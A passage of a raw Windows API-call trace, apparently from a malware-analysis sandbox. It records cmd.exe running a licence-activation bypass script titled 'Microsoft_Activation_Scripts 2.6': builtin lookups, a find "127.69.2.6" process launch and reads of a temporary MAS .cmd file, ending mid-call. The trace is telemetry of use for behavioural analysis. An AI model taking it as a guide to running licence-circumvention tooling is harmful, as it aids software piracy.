(_String1="find", _String2="PATH") returned -10 [0179.109] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0179.109] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0179.109] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0179.109] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0179.109] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0179.109] _wcsicmp (_String1="find", _String2="VER") returned -16 [0179.109] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0179.109] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0179.110] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0179.110] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0179.110] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0179.110] _wcsicmp (_String1="find", _String2="START") returned -13 [0179.110] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0179.110] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0179.110] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0179.110] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0179.110] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0179.110] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0179.110] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0179.110] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0179.110] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0179.110] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0179.110] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0179.110] GetProcessHeap () returned 0x19a8f1e0000 [0179.110] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f201200 [0179.110] SetErrorMode (uMode=0x0) returned 0x0 [0179.110] SetErrorMode (uMode=0x1) returned 0x0 [0179.110] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f201210, lpFilePart=0x43f9efe4f0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe4f0*="System32") returned 0x13 [0179.110] SetErrorMode (uMode=0x0) returned 0x1 [0179.110] GetProcessHeap () returned 0x19a8f1e0000 [0179.110] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f201200, Size=0x42) returned 0x19a8f201200 [0179.110] GetProcessHeap () returned 0x19a8f1e0000 [0179.110] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f201200) returned 0x42 [0179.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0179.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fbbf0 [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f0370 [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0370, Size=0xf0) returned 0x19a8f1f0370 [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0370) returned 0xf0 [0179.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e5f40 [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5f40, Size=0x88) returned 0x19a8f1e5f40 [0179.111] GetProcessHeap () returned 0x19a8f1e0000 [0179.111] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5f40) returned 0x88 [0179.111] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.111] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0x19a8f1f8a00 [0179.111] FindClose (in: hFindFile=0x19a8f1f8a00 | out: hFindFile=0x19a8f1f8a00) returned 1 [0179.111] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0xffffffffffffffff [0179.112] GetLastError () returned 0x2 [0179.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0x19a8f1f8940 [0179.112] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0179.112] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.112] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.143] GetProcessHeap () returned 0x19a8f1e0000 [0179.143] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1f0120 [0179.143] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.143] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.143] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.143] GetFileType (hFile=0x24) returned 0x2 [0179.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0179.143] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe528 | out: lpMode=0x43f9efe528) returned 1 [0179.143] _dup (_FileHandle=1) returned 3 [0179.144] _close (_FileHandle=1) returned 0 [0179.144] _wcsicmp (_String1="nul", _String2="con") returned 11 [0179.144] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efe4c0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0179.144] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0179.144] GetProcessHeap () returned 0x19a8f1e0000 [0179.144] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20c8d0 [0179.144] GetProcessHeap () returned 0x19a8f1e0000 [0179.144] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f8ff0 [0179.144] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0179.144] GetProcessHeap () returned 0x19a8f1e0000 [0179.144] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f201260 [0179.144] SetErrorMode (uMode=0x0) returned 0x0 [0179.144] SetErrorMode (uMode=0x1) returned 0x0 [0179.144] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f201270, lpFilePart=0x43f9efe280 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe280*="System32") returned 0x13 [0179.144] SetErrorMode (uMode=0x0) returned 0x1 [0179.144] GetProcessHeap () returned 0x19a8f1e0000 [0179.144] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f201260, Size=0x42) returned 0x19a8f201260 [0179.144] GetProcessHeap () returned 0x19a8f1e0000 [0179.144] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f201260) returned 0x42 [0179.144] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0179.144] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa6f0 [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f2012c0 [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f2012c0, Size=0xf0) returned 0x19a8f2012c0 [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f2012c0) returned 0xf0 [0179.145] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1f0470 [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0470, Size=0x88) returned 0x19a8f1f0470 [0179.145] GetProcessHeap () returned 0x19a8f1e0000 [0179.145] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0470) returned 0x88 [0179.145] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.145] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe000) returned 0x19a8f1f8ca0 [0179.145] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0179.145] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe000) returned 0xffffffffffffffff [0179.146] GetLastError () returned 0x2 [0179.146] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe000) returned 0x19a8f1f86a0 [0179.146] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0179.146] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.146] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.146] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe560, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.146] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe480, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe380 | out: lpAttributeList=0x43f9efe480, lpSize=0x43f9efe380) returned 1 [0179.146] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe480, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe36c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe480, lpPreviousValue=0x0) returned 1 [0179.146] GetStartupInfoW (in: lpStartupInfo=0x43f9efe410 | out: lpStartupInfo=0x43f9efe410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0179.146] GetProcessHeap () returned 0x19a8f1e0000 [0179.146] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f0300 [0179.146] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0179.146] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.147] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0179.148] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0179.149] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0179.149] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0179.149] GetProcessHeap () returned 0x19a8f1e0000 [0179.149] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0300) returned 1 [0179.149] GetProcessHeap () returned 0x19a8f1e0000 [0179.149] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ec980 [0179.150] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.150] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\find.exe", lpCommandLine="find \"127.69.2.6\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe3a0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find \"127.69.2.6\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe388 | out: lpCommandLine="find \"127.69.2.6\" ", lpProcessInformation=0x43f9efe388*(hProcess=0xa0, hThread=0x98, dwProcessId=0xe88, dwThreadId=0xe8c)) returned 1 [0179.156] CloseHandle (hObject=0x98) returned 1 [0179.156] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.156] GetProcessHeap () returned 0x19a8f1e0000 [0179.157] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.157] GetEnvironmentStringsW () returned 0x19a8f206860* [0179.157] GetProcessHeap () returned 0x19a8f1e0000 [0179.157] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f215dc0 [0179.157] memcpy (in: _Dst=0x19a8f215dc0, _Src=0x19a8f206860, _Size=0xfbe | out: _Dst=0x19a8f215dc0) returned 0x19a8f215dc0 [0179.157] FreeEnvironmentStringsA (penv="=") returned 1 [0179.157] GetProcessHeap () returned 0x19a8f1e0000 [0179.157] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec980) returned 1 [0179.157] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe480 | out: lpAttributeList=0x43f9efe480) [0179.157] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0179.158] _close (_FileHandle=3) returned 0 [0179.158] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0179.158] _close (_FileHandle=4) returned 0 [0179.158] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0179.328] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0x43f9efe808 | out: lpExitCode=0x43f9efe808*=0x0) returned 1 [0179.328] CloseHandle (hObject=0x90) returned 1 [0179.328] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0179.337] GetExitCodeProcess (in: hProcess=0xa0, lpExitCode=0x43f9efe808 | out: lpExitCode=0x43f9efe808*=0x0) returned 1 [0179.337] CloseHandle (hObject=0xa0) returned 1 [0179.338] GetProcessHeap () returned 0x19a8f1e0000 [0179.338] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200de0) returned 1 [0179.338] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.338] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.339] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.339] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.339] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.339] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.339] SetConsoleInputExeNameW () returned 0x1 [0179.339] GetConsoleOutputCP () returned 0x1b5 [0179.340] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.340] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.340] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.340] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.340] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.340] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7022, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6e [0179.340] GetProcessHeap () returned 0x19a8f1e0000 [0179.341] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0470) returned 1 [0179.341] GetProcessHeap () returned 0x19a8f1e0000 [0179.342] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2012c0) returned 1 [0179.342] GetProcessHeap () returned 0x19a8f1e0000 [0179.342] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa6f0) returned 1 [0179.342] GetProcessHeap () returned 0x19a8f1e0000 [0179.343] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201260) returned 1 [0179.343] GetProcessHeap () returned 0x19a8f1e0000 [0179.344] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ff0) returned 1 [0179.344] GetProcessHeap () returned 0x19a8f1e0000 [0179.344] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20c8d0) returned 1 [0179.344] GetProcessHeap () returned 0x19a8f1e0000 [0179.345] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0120) returned 1 [0179.345] GetProcessHeap () returned 0x19a8f1e0000 [0179.345] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f40) returned 1 [0179.345] GetProcessHeap () returned 0x19a8f1e0000 [0179.346] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0370) returned 1 [0179.346] GetProcessHeap () returned 0x19a8f1e0000 [0179.346] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fbbf0) returned 1 [0179.356] GetProcessHeap () returned 0x19a8f1e0000 [0179.356] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201200) returned 1 [0179.356] GetProcessHeap () returned 0x19a8f1e0000 [0179.356] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21adb0) returned 1 [0179.356] GetProcessHeap () returned 0x19a8f1e0000 [0179.357] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ea0) returned 1 [0179.357] GetProcessHeap () returned 0x19a8f1e0000 [0179.357] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ead50) returned 1 [0179.357] GetProcessHeap () returned 0x19a8f1e0000 [0179.358] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9090) returned 1 [0179.358] GetProcessHeap () returned 0x19a8f1e0000 [0179.358] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2011a0) returned 1 [0179.358] GetProcessHeap () returned 0x19a8f1e0000 [0179.359] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0179.359] GetProcessHeap () returned 0x19a8f1e0000 [0179.359] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20bc10) returned 1 [0179.359] GetProcessHeap () returned 0x19a8f1e0000 [0179.360] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efeb0) returned 1 [0179.360] GetProcessHeap () returned 0x19a8f1e0000 [0179.360] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0179.360] GetProcessHeap () returned 0x19a8f1e0000 [0179.360] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.361] GetProcessHeap () returned 0x19a8f1e0000 [0179.362] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f91d0) returned 1 [0179.362] GetProcessHeap () returned 0x19a8f1e0000 [0179.362] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa080) returned 1 [0179.363] GetProcessHeap () returned 0x19a8f1e0000 [0179.363] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0179.363] GetProcessHeap () returned 0x19a8f1e0000 [0179.364] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, 